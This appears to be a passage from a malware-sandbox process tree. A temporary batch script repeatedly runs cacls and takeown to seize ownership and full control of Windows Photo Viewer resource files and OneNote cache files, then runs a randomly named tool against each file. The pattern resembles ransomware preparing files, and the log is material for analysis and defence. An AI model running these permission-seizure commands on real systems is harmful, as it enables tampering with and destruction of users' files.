  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:7036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:7484
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2268
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui""
  2⤵
  PID:1264
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5724
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:7872
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5676
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin""
  2⤵
  PID:8036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin" /E /G Admin:F /C
    3⤵
    PID:7900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin"
    3⤵
    PID:6560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000007.bin" -nobanner
    3⤵
    PID:1736
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000007.bin" -nobanner
      4⤵
      PID:6540
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin""
  2⤵
  PID:6368
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin" /E /G Admin:F /C
    3⤵
    PID:7680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin"
    3⤵
    - Modifies file permissions
    PID:7708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000L.bin" -nobanner
    3⤵
    PID:8832
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000L.bin" -nobanner
      4⤵
      PID:8844
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin""
  2⤵
  PID:948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin" /E /G Admin:F /C
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin"
    3⤵
    PID:3492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000V.bin" -nobanner
    3⤵
    PID:8112
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000V.bin" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:6448
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin""
  2⤵
  PID:8040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin" /E /G Admin:F /C
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin"
    3⤵
    - Modifies file permissions
    PID:5436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000006L.bin" -nobanner
    3⤵
    PID:6872
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000006L.bin" -nobanner
      4⤵
      PID:5284
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin""
  2⤵
  PID:7908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin" /E /G Admin:F /C
    3⤵
    PID:8096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin"
    3⤵
    - Modifies file permissions
    PID:7560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000007T.bin" -nobanner
    3⤵
    PID:8056
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000007T.bin" -nobanner
      4⤵
      PID:6120
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7144
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin""
  2⤵
  PID:2148
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin" /E /G Admin:F /C
    3⤵
    PID:6988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin"
    3⤵
    - Modifies file permissions
    PID:3760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000087.bin" -nobanner
    3⤵
    PID:9188
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000087.bin" -nobanner
      4⤵
      PID:4360
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8372
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin""
  2⤵
  PID:3124
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin" /E /G Admin:F /C
    3⤵
    PID:4272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin"
    3⤵
    PID:5752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000099.bin" -nobanner
    3⤵
    PID:1476
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000099.bin" -nobanner
      4⤵
      PID:6000
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4352
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin""
  2⤵
  PID:8500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin" /E /G Admin:F /C
    3⤵
    PID:5312
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin"
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000009J.bin" -nobanner
    3⤵
    PID:3480
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000009J.bin" -nobanner
      4⤵
      PID:1004
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin""
  2⤵
  PID:6756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin" /E /G Admin:F /C
    3⤵
    PID:6400
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin"
    3⤵
    - Modifies file permissions
    PID:4052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "000000A4.bin" -nobanner
    3⤵
    PID:2428
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "000000A4.bin" -nobanner
      4⤵
      PID:3704
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin""
  2⤵
  PID:6264
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin" /E /G Admin:F /C
    3⤵
    PID:6204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin"
    3⤵
    - Modifies file permissions
    PID:8128
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "000000AF.bin" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4780
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "000000AF.bin" -nobanner
      4⤵
      PID:6240
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin""
  2⤵
  PID:9168
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin" /E /G Admin:F /C
    3⤵
    PID:7884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin"
    3⤵
    PID:6312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "000000AP.bin" -nobanner
    3⤵
    PID:9088
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "000000AP.bin" -nobanner
      4⤵
      PID:2480
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin""
  2⤵
  PID:8988
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin" /E /G Admin:F /C
    3⤵
    PID:8812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin"
    3⤵
    PID:9040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "000000B5.bin" -nobanner
    3⤵
    PID:3732
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "000000B5.bin" -nobanner
      4⤵
      PID:9036
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_4_PNGEncoded_Header.bin""
  2⤵
  PID:2908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_4_PNGEncoded_Header.bin" /E /G Admin:F /C
    3⤵
    PID:8692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_4_PNGEncoded_Header.bin"
    3⤵
    PID:8664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "TileCache_100_4_PNGEncoded_Header.bin" -nobanner
    3⤵
    PID:3156
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "TileCache_100_4_PNGEncoded_Header.bin" -nobanner
      4⤵
      PID:8700
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8540
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:8592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4248
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    PID:5756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9160
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:3132
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:1548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5988
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:8892
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui""
  2⤵
  PID:8448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:7988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:9260
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:9296
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:9340
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:9392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    PID:9408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:9424
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:9440
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:9500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:9548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    PID:9568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:9584
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:9600
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9624
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui""
  2⤵
  PID:9652
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:9704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:9720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:9736
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:9752
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:9804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    PID:9864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:9880
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:9896
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:10000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:10048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:10064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:10080
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:10096
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:10124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui""
  2⤵
  PID:10160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:10208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui"
    3⤵
    PID:10224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:8452
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:8464
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin""
  2⤵
  PID:7368
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin" /E /G Admin:F /C
    3⤵
    PID:8560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin"
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000009.bin" -nobanner
    3⤵
    PID:7960
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000009.bin" -nobanner
      4⤵
      PID:6608
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin""
  2⤵
  PID:704
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin" /E /G Admin:F /C
    3⤵
    PID:8728
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin"
    3⤵
    - Modifies file permissions
    PID:8048
